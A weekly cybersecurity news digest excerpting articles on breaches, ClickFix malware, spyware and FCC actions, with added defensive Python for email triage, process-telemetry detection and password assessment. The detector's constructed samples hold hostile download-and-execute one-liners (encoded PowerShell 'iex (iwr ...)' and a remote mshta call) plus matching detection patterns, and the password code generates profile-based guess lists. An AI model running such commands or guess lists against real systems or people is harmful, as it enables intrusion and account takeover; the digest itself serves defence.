Pete Recommends – Weekly highlights on cyber security issues, November 29, 2025

Subject: Homeland Security Is Reportedly Probing Bitcoin Mining Giant Bitmain for National Security Reasons
Source: Gizmodo
https://gizmodo.com/homeland-security-is-reportedly-probing-bitcoin-mining-giant-bitmain-for-national-security-reasons-2000689746

According to a new report from Bloomberg, federal authorities have quietly been digging into Bitmain, the Beijing-based bitcoin mining hardware manufacturing giant, over fears that its devices could serve as a backdoor for Chinese espionage or even deliberate blackouts on the U.S. electrical grid. The Department of Homeland Security is said to have been running a secretive probe dubbed “Operation Red Sunset” for months, with agents tearing apart imported machines at ports in search of hidden kill switches or remote-access tricks.

Of course, fears of Beijing slipping backdoors into hardware have been prevalent for over a decade, with claims ranging from People’s Liberation Army operatives forcing subcontractors to solder rice-grain-sized spy chips onto Supermicro server motherboards to Vodafone admitting it found hidden backdoors in Huawei telecom gear deployed across Italy. Just this year, reports surfaced of undocumented cellular modems lurking inside Chinese solar inverters sold across Europe and the U.S., quietly pinging home even when powered off, prompting frantic teardowns and emergency firmware nukes.

That said, hard proof of intentional state-level sabotage oftentimes remains murky (or potentially classified).

[…]


Subject: How to Scan, Sign, and Send a Contract From Your Android Device in 2025
Source: Android Headlines
https://www.androidheadlines.com/2025/11/how-to-scan-sign-and-send-a-contract-from-your-android-device-in-2025.html

A crucial contract lands in your inbox, but you’re away from your desk. The deadline is tight. This isn’t a problem—it’s an opportunity to leverage the powerful device in your pocket. In today’s fast-paced professional world, waiting for access to a desktop and scanner is a luxury few can afford. The modern smartphone is no longer just a communication tool; it has become a complete mobile office capable of handling sensitive paperwork with the same efficiency and professionalism as a traditional setup. This shift is supported by the rapid adoption of mobile-first document solutions, a trend reflected in the continued growth of the online fax market, proving that professionals are increasingly relying on their phones to get work done from anywhere. This guide will walk you through a simple, three-step workflow to scan, sign, and securely send any document using only your Android device.[…]

Filed: https://www.androidheadlines.com/category/apps


Subject: Harvard University discloses data breach affecting alumni, donors
Source: bleepingcomputer
https://www.bleepingcomputer.com/news/security/harvard-university-discloses-data-breach-affecting-alumni-donors/

Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.

The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and “biographical information pertaining to University fundraising and alumni engagement activities.”

However, according to Klara Jelinkova, Harvard’s Vice President and University Chief Information Officer, and Jim Husson, the university’s Vice President for Alumni Affairs and Development, the compromised IT systems didn’t contain Social Security numbers, passwords, payment card information, or financial info.


Subject: Email blind spots are back to bite security teams
Source: Help Net Security
https://www.helpnetsecurity.com/2025/11/24/hornetsecurity-email-attack-tactics-report/

The threat landscape is forcing CISOs to rethink what they consider normal. The latest Cybersecurity Report 2026 by Hornetsecurity, based on analysis of more than 70 billion emails and broad threat telemetry, shows attackers adopting automation, AI-driven social engineering, and new evasion techniques at scale.

Email becomes a more dangerous channel – Email remains the primary entry point for compromise. Malware in email increased by more than 130% year over year. Scams rose by more than 30% and phishing increased by more than 20%. These categories continue to drive most of the operational impact that organizations experience, including account compromise and business disruption.

TXT files grew more than 180% as a malicious carrier, and legacy DOC files grew more than 118%. These are file types that many security teams no longer view as high risk. Their resurgence reflects an attacker strategy to exploit blind spots in filtering and inspection. ZIP archives remain common, while formats like HTML and RAR declined.

[…]

Attackers increasingly use forged headers, obscure top-level domains, URL shortening, and HTML techniques that confuse filters rather than readers. The goal is to slip past controls, avoid early detection, and begin multi-step intrusion chains.
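
The evasion tricks the report lists (replies and bounces routed to a different domain than the From header, watch-listed TLDs, shorteners, anchor text that names one host while the href points at another, invisible HTML blocks, and "low-risk" attachment types whose bytes do not match their extension) map directly onto checks a triage script can run before a message reaches a mailbox. The Python below is an added example written for this digest, not Hornetsecurity's tooling; the message it builds and parses is constructed, and the shortener, TLD and extension watch-lists are assumptions to be tuned against local telemetry.

```python
import email
import os
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import urlparse

# Assumption: locally curated watch-lists. Tune them to what your own filters miss.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}
WATCH_TLDS = {"top", "zip", "xyz", "mov", "icu"}
WATCH_EXTS = {".txt", ".doc", ".zip", ".html", ".rar"}
MAGIC = {".doc": b"\xd0\xcf\x11\xe0", ".zip": b"PK\x03\x04", ".rar": b"Rar!", ".exe": b"MZ"}

# Constructed HTML body: shortener whose visible text names another host,
# a watch-listed TLD, and an invisible block of filler text.
HTML_BODY = """<html><body>
<p>Please review the attached invoice via
<a href="https://tinyurl.com/inv4471">https://portal.example-corp.com</a>
or sign in at <a href="http://login.example-corp.top/">our portal</a>.</p>
<div style="display:none">newsletter archive preferences unsubscribe</div>
</body></html>
"""


def build_sample() -> bytes:
    """Constructed message (not a real capture) exhibiting each trick at once."""
    msg = EmailMessage()
    msg["From"] = "Accounts Payable <ap@example-corp.com>"
    msg["Reply-To"] = "ap-desk@example-corp.top"
    msg["Return-Path"] = "<bounce@mailer.example.xyz>"
    msg["To"] = "finance@example.org"
    msg["Subject"] = "Invoice 4471 - action required"
    msg.set_content("Please review the attached invoice.")
    msg.add_alternative(HTML_BODY, subtype="html")
    # Named .doc but carrying a ZIP local-file header: the magic-byte check catches it.
    msg.add_attachment(b"PK\x03\x04" + bytes(26), maintype="application",
                       subtype="msword", filename="invoice.doc")
    return msg.as_bytes()


def _domain(header_value: str) -> str:
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def triage(raw: bytes) -> list:
    """Return (code, detail) findings for one RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    # 1. Header forgery hints: replies or bounces leave the sender's domain.
    from_dom = _domain(str(msg["From"]))
    for hdr in ("Reply-To", "Return-Path"):
        dom = _domain(str(msg[hdr])) if msg[hdr] else ""
        if dom and dom != from_dom:
            findings.append((hdr.lower() + "-mismatch", f"{from_dom} vs {dom}"))

    # 2. Links: shorteners, watch-listed TLDs, anchor text naming a different host.
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body else ""
    for href, text in re.findall(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', html, re.I | re.S):
        host = _host(href)
        if host in SHORTENERS:
            findings.append(("url-shortener", href))
        if host.rpartition(".")[2] in WATCH_TLDS:
            findings.append(("watch-tld", href))
        shown = _host(text.strip()) if text.strip().lower().startswith("http") else ""
        if shown and shown != host:
            findings.append(("anchor-host-mismatch", f"shows {shown}, goes to {host}"))
    if re.search(r"display\s*:\s*none|font-size\s*:\s*0", html, re.I):
        findings.append(("hidden-html", "invisible block present"))

    # 3. Attachments: "low risk" extensions, and extension/content disagreement.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = os.path.splitext(name)[1].lower()
        data = part.get_payload(decode=True) or b""
        if ext in WATCH_EXTS:
            findings.append(("attachment-watch-ext", name))
        expected = MAGIC.get(ext)
        if expected and not data.startswith(expected):
            actual = next((e for e, m in MAGIC.items() if data.startswith(m)), "unknown")
            findings.append(("attachment-magic-mismatch", f"{name} looks like {actual}"))
    return findings


if __name__ == "__main__":
    for code, detail in triage(build_sample()):
        print(f"{code:28} {detail}")
```

None of these checks is a verdict on its own; the value is in scoring them together, since a legitimate newsletter will trip one (a shortener, say) but rarely five.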

Subject: Is Your Android TV Streaming Box Part of a Botnet?
Source: Krebs on Security
https://krebsonsecurity.com/2025/11/is-your-android-tv-streaming-box-part-of-a-botnet/

On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix, ESPN and Hulu, all for a one-time fee of around $400. But security experts warn these TV boxes require intrusive software that forces the user’s network to relay Internet traffic for others, traffic that is often tied to cybercrime activity such as advertising fraud and account takeovers.

Superbox bills itself as an affordable way for households to stream all of the television and movie content they could possibly want, without the hassle of monthly subscription fees — for a one-time payment of nearly $400.

“Tired of confusing cable bills and hidden fees?,” Superbox’s website asks in a recent blog post titled, “Cheap Cable TV for Low Income: Watch TV, No Monthly Bills.”

“Real cheap cable TV for low income solutions does exist,” the blog continues. “This guide breaks down the best alternatives to stop overpaying, from free over-the-air options to one-time purchase devices that eliminate monthly bills.”

Superbox claims that watching a stream of movies, TV shows, and sporting events won’t violate U.S. copyright law.

Superbox’s homepage includes a prominent message stating the company does “not sell access to or preinstall any apps that bypass paywalls or provide access to unauthorized content.” The company explains that they merely provide the hardware, while customers choose which apps to install.

“We only sell the hardware device,” the notice states. “Customers must use official apps and licensed services; unauthorized use may violate copyright law.”

Experts say while these Android streaming boxes generally do what they advertise — enabling buyers to stream video content that would normally require a paid subscription — the apps that enable the streaming also ensnare the user’s Internet connection in a distributed residential proxy network that uses the devices to relay traffic from others.

Superbox doesn’t advertise its products in the conventional sense. Rather, it seems to rely on lesser-known influencers on places like Youtube and TikTok to promote the devices. Meanwhile, Ashley said, Superbox pays those influencers 50 percent of the value of each device they sell.

These streaming devices from no-name technology vendors are another example of the maxim, “If something is free, you are the product,” meaning the company is making money by selling access to and/or information about its users and their data.

This explainer from the Electronic Frontier Foundation delves a bit deeper into each of the potential symptoms listed above.


Subject: ClickFix attack uses fake Windows Update screen to push malware
Source: BleepingComputer.com
https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/

ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.

ClickFix is a social-engineering attack in which users are convinced to paste and execute code or commands in the Windows Command Prompt that lead to malware running on the system.

The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with increasingly advanced and deceptive lures.

Fullscreen browser page – Since October 1st, researchers have observed ClickFix attacks where the pretext for executing dangerous commands was either completing the installation of a critical Windows security update or the more common “human verification” lure [1, 2].

The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes attacker-supplied commands that JavaScript running on the site had already copied to the clipboard.
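
Whatever the lure, the pasted command has to be launched by the user, so it shows up in process-creation telemetry as an interpreter started from the user's own shell (for a Run-dialog or desktop launch, explorer.exe is the parent), typically with a hidden window, an encoded or one-liner payload, and a remote URL it fetches and executes. The Python below is an added example for this digest, not code from BleepingComputer or the cited researchers. The four records are constructed, the field names assume a collector that flattens Sysmon event 1 or Security event 4688 into parent/image/cmdline, and the indicator list is a starting point rather than a complete signature; if your collector records the grandparent, extend the shell check to it so a command typed into a cmd.exe window is also caught.

```python
import base64
import re


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records, not real telemetry. Assumed schema: parent, image, cmdline.
EVENTS = [
    {   # pasted from a fake "Windows Update" page into the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -w hidden -NoP -ep bypass -enc "
                   + encode_ps("iex (iwr 'http://203.0.113.7/update.txt' -UseBasicParsing)"),
    },
    {   # "human verification" variant that fetches an HTA
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta http://203.0.113.7/verify.hta",
    },
    {   # scheduled maintenance: same binary, benign parent and arguments
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NonInteractive -File C:\Scripts\backup.ps1",
    },
    {   # ordinary user activity
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
    },
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
USER_SHELLS = {"explorer.exe"}   # Run dialog and desktop launches are children of explorer.exe

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = [
    ("encoded-command", ENC_RE),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download-exec", re.compile(
        r"(?:iex|invoke-expression|downloadstring|iwr|invoke-webrequest|curl|certutil|bitsadmin)\b"
        r".*?https?://", re.I | re.S)),
    ("mshta-remote", re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),
]


def decode_encoded_command(cmdline: str) -> str:
    """Recover the plaintext script behind -enc so the indicators can see it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> list:
    """Indicator names that fire for one process-creation record."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return []
    hits = ["launched-from-shell"] if parent in USER_SHELLS else []
    text = ev["cmdline"] + "\n" + decode_encoded_command(ev["cmdline"])
    hits += [name for name, rx in INDICATORS if rx.search(text)]
    return hits


def flag_events(events, threshold: int = 2) -> list:
    """(cmdline, hits) for every record with at least `threshold` indicators."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= threshold:
            flagged.append((ev["cmdline"], hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in flag_events(EVENTS):
        print(hits, "<-", cmdline[:70])
```

The decode step matters more than any single regex: an encoded one-liner looks like noise until it is turned back into UTF-16LE text, at which point the download-and-execute pattern is the same as in the unencoded variants.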


Subject: FCC Corrects Course, Outlines Improved Cybersecurity Measures
Source: FCC
https://www.fcc.gov/document/fcc-corrects-course-outlines-improved-cybersecurity-measures
H/T Sabrina: FCC Corrects Course, Outlines Improved Cybersecurity Measures

Agency Revokes Unlawful Decision and Repositions Agency for Effective and Agile Cybersecurity Responsiveness

WASHINGTON, November 20, 2025—The Federal Communications Commission today took action to correct course and rescind an unlawful and ineffective prior Declaratory Ruling misconstruing the Communications Assistance for Law Enforcement Act (CALEA). The Order also withdraws an NPRM that accompanied that Declaratory Ruling, which was based in part on the Declaratory Ruling’s flawed legal analysis and proposed ineffective cybersecurity requirements. Today’s action follows months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon.

Foreign adversaries and other bad actors have repeatedly launched cyberattacks targeting American communications networks. Over the past several months, the agency has engaged with providers that have agreed to take “extensive, urgent, and coordinated efforts to mitigate operational risks, protect consumers, and preserve national security interests” against the range of cyberattacks that target their networks. Today’s action reinforces this commitment going forward.

Since January, the Commission has taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents. The Commission established a Council on National Security to facilitate the Commission’s engagement with national security partners and mitigate America’s vulnerabilities to cyberattacks, espionage, and surveillance by foreign adversaries. It has also adopted targeted rules to address the greatest cybersecurity risks to critical communications infrastructure without imposing inflexible and ambiguous requirements, for example requiring submarine cable licensees to create and implement cybersecurity risk management plans. The FCC has also adopted rules to ban “bad labs” in the FCC’s equipment authorization program to ensure no such entities are subject to untrustworthy actors that pose a risk to national security.

Action by the Commission November 20, 2025 by Order on Reconsideration (FCC 25-81). Chairman Carr and Commissioner Trusty approving. Commissioner Gomez dissenting. Chairman Carr, Commissioners Gomez and Trusty issuing separate statements.

PS Docket No. 22-329

Related Document(s):

Order – FCC Corrects Course, Outlines Improved Cybersecurity Measures

Subject: Fake Courier Robs SF Resident of $11M in Cryptocurrency
Source: Newser
https://www.newser.com/story/379277/fake-courier-robs-sf-resident-of-11m-in-cryptocurrency.html

Police say the suspect pulled a gun, tied up the victim with duct tape, and fled with the victim’s phone, laptop, and the contents of his crypto wallet. Authorities have not released further details on how the cryptocurrency was accessed. The victim, described by Tan as a friend, suffered injuries that were not life-threatening. No arrests have been made.


Subject: Families of Oct. 7 Victims Sue Binance
Source: Newser
https://www.newser.com/story/379346/families-of-oct-7-victims-sue-binance.html

Binance, the world’s largest cryptocurrency exchange, is facing a lawsuit from the families of 300 American citizens who were injured or killed in the Oct. 7, 2023 attack on Israel. The families allege that Binance helped Hamas and other terrorist organizations move over $1 billion through its platform, effectively aiding terrorism, the New York Times reports.

The suit, filed in federal court in North Dakota, claims Binance ignored warnings about suspicious activity and failed to enforce basic security checks, allowing money to flow to groups like Hamas, Hezbollah, and Iran’s Islamic Revolutionary Guard Corps. The plaintiffs argue that Binance’s actions went beyond accidental lapses and were part of a deliberate strategy to attract high-risk clients and evade oversight. “This was not a compliance lapse; it was a business model,” said Jonathan Missner, a lawyer representing the families.

  • The plaintiffs include Yechiel Leiter, the current Israeli ambassador to the US, Bloomberg reports. His son, an Israeli soldier, was killed by Hamas.

Subject: CodeRED Emergency Notification System
Source: Woodbury, MN
https://www.woodburymn.gov/225/CodeRED-Emergency-Notification-System

CodeRED Emergency Notification System

The City of Woodbury, in conjunction with Washington County, uses CodeRED, a high-speed telephone calling and texting system, to notify local residents and businesses about emergency situations. The system allows the city to send critical communications to the entire city or to targeted areas within the city in a matter of minutes.

The CodeRED system is only used for emergency and life safety purposes. Examples of incidents when CodeRED is used include missing child alerts, chemical or gas leaks, fires or floods, extended utility outages, evacuation notices and routes, and other instances where rapid and accurate information is essential for life safety. The system will not be used for weather warnings, but may be used for follow-up information such as evacuations or shelter locations.

CodeRED Emergency Notification System Experiences Nationwide Outage

In an effort to promote transparent information and to keep our community informed, we are sharing Washington County’s message about the current nationwide outage of the CodeRed emergency notification system…


Subject: CISA: Spyware crews breaking into Signal, WhatsApp accounts
Source: The Register
https://www.theregister.com/2025/11/25/cisa_spyware_gangs/

Attackers sidestep encryption with spoofed apps and zero-click exploits to compromise ‘high-value’ mobile users – CISA has warned that state-backed snoops and cyber-mercenaries are actively abusing commercial spyware to break into Signal and WhatsApp accounts, hijack devices, and quietly rummage through the phones of what the agency calls “high-value” users.

In an alert published Monday, the US government’s cyber agency said it’s tracking multiple miscreants that are using a mix of phishing, bogus QR codes, malicious app impersonation, and, in some cases, full-blown zero-click exploits to compromise messaging apps that most people assume are safe.

The agency says the activity it’s seeing suggests an increasing focus on “high-value” individuals – everyone from current and former senior government, military, and political officials to civil society groups across the US, the Middle East, and Europe. In many of the campaigns, attackers delivered spyware first and asked questions later, using the foothold to deploy more payloads and deepen their access.

For example, Google’s Threat Intelligence Group in February detailed how multiple Russia-aligned crews, including Sandworm and Turla, attempted to snoop on Signal users by abusing the app’s “linked devices” feature. By coaxing victims into scanning a tampered QR code, the operators could quietly add a second, attacker-controlled device to the account. Once paired, new messages flowed to both ends in real time, letting Moscow’s finest eavesdrop.

Subject: Senator urges CBP to quit using tech to track and detain ‘suspicious’ drivers
Source: FedScoop
https://fedscoop.com/customs-border-protection-technology-detail-drivers/

Customs and Border Protection must stop using license plate readers and predictive algorithms to track Americans’ movements until it explains the policies behind the technologies, a Senate Commerce, Science and Transportation Committee member

Markey raised additional concerns about the implications of bulk collection of sensitive data, such as the potential for the government to track women traveling across state lines to seek abortion care. The idea of law enforcement stopping Americans and detaining them “based solely on an algorithmic determination about their driving behavior is deeply chilling,” he wrote, adding that the entire enterprise sparks “serious constitutional concerns” regarding unreasonable searches and seizures.


Subject: Comcast to pay $1.5M fine for vendor breach affecting 270K customers
Source: BleepingComputer
https://www.bleepingcomputer.com/news/security/comcast-to-pay-15-million-fine-after-a-vendor-data-breach-affecting-270-000-customers/

Comcast will pay a $1.5 million fine to settle a Federal Communications Commission investigation into a February 2024 vendor data breach that exposed the personal information of nearly 275,000 customers.

The breach occurred in February 2024, when attackers hacked into the systems of Financial Business and Consumer Solutions (FBCS), a debt collector Comcast had stopped using two years earlier.

The FBCS data breach was initially believed to have affected 1.9 million people in total, but the tally was raised to 3.2 million in June and, finally, to 4.2 million in July.

Under the consent decree announced by the FCC on Monday, Comcast has also agreed to implement a compliance plan that includes enhanced vendor oversight to protect data and ensure customer privacy, ensuring its vendors properly dispose of customer information they no longer need for business purposes, as required by the Cable Communications Policy Act of 1984.

The telecommunications giant must also appoint a compliance officer, conduct risk assessments of vendors handling customer data every two years, file compliance reports with the FCC every six months over the next three years, and report any material violations within 30 days of discovery.


Subject: Political consultant who sent AI robocalls says he won’t pay voters, as ordered
Source: The Hill
https://thehill.com/regulation/court-battles/5624570-biden-ai-robocall-lawsuit/

The Federal Communications Commission (FCC) also fined Kramer $6 million, which he has also not paid, the AP reported. After the robocall scandal erupted, the FCC banned the use of AI robocalls.

The robocall, using Biden’s voice, urged voters to hold off on voting in the New Hampshire primary and instead vote in November.

The call was the first known use of deepfake technology in U.S. politics, sparking a tidal wave of calls to regulate the use of AI in elections.

The fake Biden voice in the call encouraged thousands of New Hampshire primary voters to stay home and “save” their votes.


Subject: Social data puts user passwords at risk in unexpected ways
Source: Help Net Security
https://www.helpnetsecurity.com/2025/11/28/research-social-media-password-risk/

Many CISOs already assume that social media creates new openings for password guessing, but new research helps show what that risk looks like in practice. The findings reveal how much information can be reconstructed from public profiles and how that data influences the strength of user passwords. The study also examines how LLMs behave when asked to generate or evaluate passwords based on that same personal information.

The research team from the University of Cagliari and the University of Salerno created a tool called SODA ADVANCE to study these effects. The tool rebuilds user profiles using public data and evaluates password strength with a combined set of metrics.
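
To make the mechanism concrete, the Python below is an added example for this digest; it is not SODA ADVANCE or code from the Cagliari and Salerno team. It takes a constructed profile of the kind that can be rebuilt from public posts, derives the guess list an attacker would try from it (each word in three spellings with common suffixes), and then checks a candidate password for profile-derived material after undoing the usual letter-to-symbol substitutions, reporting how many characters survive once that material is removed. The profile, the substitution tables and the eight-character residual threshold are assumptions.

```python
import re

# Constructed profile, not a real person: the attribute types that a public
# social-media presence tends to leak.
PROFILE = {
    "first_name": "Marco", "last_name": "Rossi", "birth_year": 1988,
    "city": "Cagliari", "pet": "Luna", "team": "Juventus", "partner": "Giulia",
}

# Forward substitutions an attacker tries, and the reverse map used when checking.
# Both are single-character maps, so translated strings keep their length.
LEET = str.maketrans("aeiost", "431057")
DELEET = str.maketrans({"4": "a", "@": "a", "3": "e", "1": "i", "!": "i",
                        "0": "o", "5": "s", "$": "s", "7": "t", "+": "t"})


def profile_tokens(profile: dict) -> dict:
    """Map each lowercase token to the profile field it came from."""
    tokens = {}
    for field, value in profile.items():
        token = str(value).lower()
        tokens.setdefault(token, field)
        if field == "birth_year":
            tokens.setdefault(token[-2:], field)      # "88" as well as "1988"
    return tokens


def guesses(profile: dict) -> set:
    """Attacker view: every profile word in three spellings with common suffixes."""
    year = str(profile.get("birth_year", ""))
    out = set()
    for field, value in profile.items():
        if field == "birth_year":
            continue
        word = str(value)
        for base in (word.lower(), word.capitalize(), word.lower().translate(LEET)):
            for suffix in ("", "!", "123", year, year[-2:], year + "!"):
                out.add(base + suffix)
    return out


def assess(password: str, profile: dict, min_residual: int = 8) -> dict:
    """Defender view: how much of the password is left once profile material is removed."""
    plain = password.lower()
    deleet = plain.translate(DELEET)       # same length, so indices line up with plain
    covered = [False] * len(password)
    matches = []
    # Longest tokens first, so "1988" is credited before its suffix "88".
    for token, field in sorted(profile_tokens(profile).items(), key=lambda kv: -len(kv[0])):
        haystack = plain if token.isdigit() else deleet   # digits must not be de-leeted
        for m in re.finditer(re.escape(token), haystack):
            if not any(covered[m.start():m.end()]):
                matches.append((field, token))
                covered[m.start():m.end()] = [True] * (m.end() - m.start())
    residual = covered.count(False)
    return {"matches": matches, "residual": residual,
            "verdict": "weak" if residual < min_residual else "ok"}


if __name__ == "__main__":
    for pw in ("Luna1988!", "M4rco_R0ss1", "correct-horse-battery-staple"):
        print(pw, assess(pw, PROFILE), "in guess list:", pw in guesses(PROFILE))
```

The point of the residual count is that a conventional meter would score "M4rco_R0ss1" as strong (eleven characters, mixed case, digits, a symbol), while against someone who has read the owner's profile it is two words and a separator.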

Posted in: Copyright, Cryptocurrency, Cybercrime, Cybersecurity, Education, Email Security, Privacy, Social Media, Travel, United States Law